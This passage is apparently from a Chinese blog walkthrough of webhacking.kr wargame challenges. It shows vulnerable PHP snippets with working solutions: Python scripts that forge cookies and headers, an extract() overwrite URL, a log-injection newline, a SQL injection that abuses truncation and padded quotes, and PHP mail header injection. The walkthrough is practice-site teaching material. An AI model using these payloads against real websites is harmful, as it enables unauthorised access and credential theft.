淡了这一步就得上脚本了,原理也很简单

#_*_coding:utf-8_*_
import re,hashlib
import requests
s=requests.session()
headers= {'cookie':'PHPSESSID=自己的cookie'}
url ='http://webhacking.kr/challenge/bonus/bonus-6/l4.php'
html = s.get(url,headers=headers).text
#print html
content = html[171:-1]
content = hashlib.md5(content).hexdigest()
#print content
url = url+'?password='+content
html = s.get(url,headers=headers).text
print html

然后得到

这里写图片描述

<?
if($_GET[imget] && $_POST[impost] && $_COOKIE[imcookie])
{
echo("<a href=###>Next</a>");
}
else
{
echo("Wrong");
}
?>

随便搞一下

这里写图片描述

好像是个全家桶…好多….
然后是关于UA的

<?
if($_COOKIE[test]==md5("$_SERVER[REMOTE_ADDR]") && $_POST[kk]==md5("$_SERVER[HTTP_USER_AGENT]"))
{
echo("<a href=###>Next</a>");
}
else
{
echo("hint : $_SERVER[HTTP_USER_AGENT]");
}
?>

这个就不用讲了吧…

#_*_coding:utf-8_*_
import re,hashlib
import requests
s=requests.session()
headers= {'cookie':'PHPSESSID=025c3bf4e886fa336fe9b186fd0097d4;test=自己公网ip的md5值','User-Agent':'1'}
proxies={'http':'http:127.0.0.1:ss端口'} #这里我用的ss所以绑定的本地端口
url ='http://webhacking.kr/challenge/bonus/bonus-6/gpcc.php'
data = {'kk':'c4ca4238a0b923820dcc509a6f75849b'}
html = requests.post(url,headers=headers,data=data,proxies=proxies).text
print html

这里写图片描述

没错…居然还没完….下一关你的公网ip去电小数点,变量名和变量值

<?
extract($_GET);
if(!$_GET[addr]) $addr=$_SERVER[REMOTE_ADDR];
if($addr=="127.0.0.1")
{
echo("<a href=###>Next</a>");
}
else
{
echo("Wrong");
}
?>

经典漏洞,构造如下通过

http://webhacking.kr/challenge/bonus/bonus-6/ipt.php?addr=127.0.0.1

再往下…恶心…

http://webhacking.kr/challenge/bonus/bonus-6/nextt.php?ans=acegikmoqsuwy

终于搭了关底了…但是没什么的,自己去算一下就好了,懒得算就直接输出一下,最后自己生成在一个文件夹中的一个文件之中…恶心死了

第三十八关

非常疑惑的一道题目,说是输入admin会报错,打开admin.php还会发现出现ip:你的输入,提示admin,但是是个啥???还说log injection…搞不懂,可能是想修改了log日志吧!!!我们可以构造虚假的log信息!
比如说我们这样

80\n1.1.1.1:80

然后就可以伪造一个虚假的登录ip了,soga,解决方案,你的\nip:admin

第三十六关

看到提示是vi blackout,感觉应该是什么文件邪路才对,但是经过测试并没有发现什么东西,感觉是自己弄错了?
从来没怎么去试,每次我们在使用vi的时候,比如我们创建一个hello文件的时候,然后我们键入一个字符串,然后在另一个终端我们会发现.hello.swp文件。cat一下就会发现,就算你没有保存hello文件在缓存中内容还是一致的!

这里写图片描述

但是为啥做不了….
看了大佬的题解发现…题目坏了…不过应该是不难的嗯
解决的答案是MD5(自己的ip+空格+一串字符dlseprtmvpdlwlfmfquswhgkwkglgl)其中+只是为连接符,形如

xx.xxx.xxx.xxx dlseprtmvpdlwlfmfquswhgkwkglgl

但是不明白为什么他的缓存文件不见了

第三十九关

先挑简单的做做,嘿嘿嘿嘿,但是猛一看还是有点蒙圈,把单引号变成了双份,过滤了斜杠来着,而且没有闭合

<?

$pw="????";

if($_POST[id])
{
$_POST[id]=str_replace("\\","",$_POST[id]);
$_POST[id]=str_replace("'","''",$_POST[id]);
$_POST[id]=substr($_POST[id],0,15);
$q=mysql_fetch_array(mysql_query("select 'good' from zmail_member where id='$_POST[id]"));

if($q[0]=="good") @solve();

}

?>

这个时候就动歪脑筋了,有一个截断!而且我们知道再mysql中输入如下两种情况效果相同

mysql> select 'good' from flag where id='1';
+------+
| good |
+------+
| good |
+------+
1 row in set (0.00 sec)
mysql> select 'good' from flag where id='1     ';
+------+
| good |
+------+
| good |
+------+
1 row in set (0.00 sec)

那么我们利用这个截断,构造如下

id=1%20%20%20%20%20%20%20%20%20%20%20%20%20%27

然后就完成了嗯!

第四十七关

关键代码如下

<?
if($_POST[email])
{
$pass="????";
$header="From: $_POST[email]\r\n";
mail("[email protected]","readme","password is $pass",$header);
echo("<script>alert('Done');</script><meta http-equiv=refresh content=1>");
}
?>

这个题目也是很好的,之前没有接触过这个冬东东,利用了php的邮件注入
这里推荐一个frebuff的非常好的文章,其实这个应该是利用邮箱去看的,这里利用了邮箱注入的添加Cbb和添加Bb功能像特定额用户发送额外的邮件,在实战中也就可以达到得知邮件内容的目的了嗯!非常好的题目!!!!

这里写图片描述

第五十四关

每次碰到异步传输我就蒙蔽了….看关键的函数

function run(){
  if(window.ActiveXObject){
   try {
    return new ActiveXObject('Msxml2.XMLHTTP');
   } catch (e) {
    try {
     return new ActiveXObject('Microsoft.XMLHTTP');
    } catch (e) {
     return null;
    }
   }
  }else if(window.XMLHttpRequest){
   return new XMLHttpRequest();

  }else{
   return null;
  }
 }

x=run();

function answer(i)
{
x.open('GET','?m='+i,false);
x.send(null);
aview.innerHTML=x.responseText;
i++;
if(x.responseText) setTimeout("answer("+i+")",100);
if(x.responseText=="") aview.innerHTML="?";
}

setTimeout("answer(0)",10000);

这个给了这个answer函数,说实话到现在我都不知道这个原理是啥能保证每次都一样。。下面有一个answer需要等待10秒,而且到了最后没有回显的时候将一切的北荣都替换成了?这个不利于我们观看,于是我们需要修改代码在console运行

function answer(i)
{
x.open('GET','?m='+i,false);
x.send(null);
aview.innerHTML+=x.responseText;
i++;
if(x.responseText) setTimeout("answer("+i+")",1);
if(x.responseText=="") alert(aview.innerHTML);
}
answer(0)

这题参考了大牛的思路…真是菜逼我…最后的效果如下

这里写图片描述

第五十八关

首先通过看js脚本发现了存在下载文件为hackme.swf,然后需要审计
我们最后能在代码中找到一个关键的网址,我猜测这个是类似写入到flash中恶意代码一类的东西,当然这里只是谢了一些无用的东西。总之有些意思

这里写图片描述

http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php

ps(把简单题写完了,准备攻克难题了)


















發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章